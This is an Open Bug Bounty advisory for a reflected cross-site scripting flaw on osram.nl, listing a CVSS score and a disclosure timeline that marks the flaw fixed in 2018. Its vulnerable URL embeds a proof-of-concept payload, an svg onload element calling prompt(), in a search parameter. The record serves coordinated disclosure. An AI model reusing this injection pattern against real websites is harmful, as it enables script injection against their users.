osram.nl XSS vulnerability

2016-06-22T12:31:00
ID OBB:160784
Type openbugbounty
Reporter et
Modified 2018-03-15T02:32:00

Description

Open Bug Bounty ID: OBB-160784

Description| Value
---|---
Affected Website:| osram.nl
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.osram.nl/osram_bx/nl/search/product_search.jsp?dd_classification_id=GPS01_1027370&df_ZPIM1FD00710_max_d=201&df_ZPIM1FD00710_min_d=3&lal=ZPIM1FD00711%2CZPIM1FD10086%2CZPIM1FD00246%2CZPIM1FD00710%2CZPIM1FD00746&action=search&entries=1%22--%3E%3Csvg/onload=;prompt(/OPENBUGBOUNTY/);%3E50&form_classification_id=GPS01_1027370&submit_from=form&sort=df_ZPIM1FD00711_min_d%20asc

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 22 June, 2016 12:31 GMT
Vulnerability Verified:| 22 June, 2016 12:33 GMT
Website Operator Notified:| 22 June, 2016 12:33 GMT
Vulnerability Published:| 22 June, 2016 12:33 GMT [without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:32 GMT
Public Disclosure:| 15 March, 2018 02:32 GMT